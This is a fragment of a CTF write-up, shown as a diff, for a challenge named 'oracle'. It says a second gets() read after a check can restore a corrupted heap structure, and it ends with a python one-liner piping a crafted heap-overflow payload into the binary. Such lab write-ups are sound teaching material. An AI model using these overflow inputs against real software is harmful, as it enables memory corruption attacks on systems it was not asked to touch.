mullerdavid/ctf_writeups/cyberquest23/oracle/WRITEUP.md

 ![](screenshots/6.png)

-The second read to the input buffer with gets is after the check, and can restore the corrupted heap structure.
+There is a second read to the input buffer after the check with gets, and can restore the corrupted heap structure.
 Writing back the fixed structure fixing the problem.

 ```bash
 python -c 'print("A"*32+"X"*31+"\n"+"X"*31+"\n"+"A"*24+"\x31\x00\x00\x00\x00\x00\x00\x00")' | ./oracle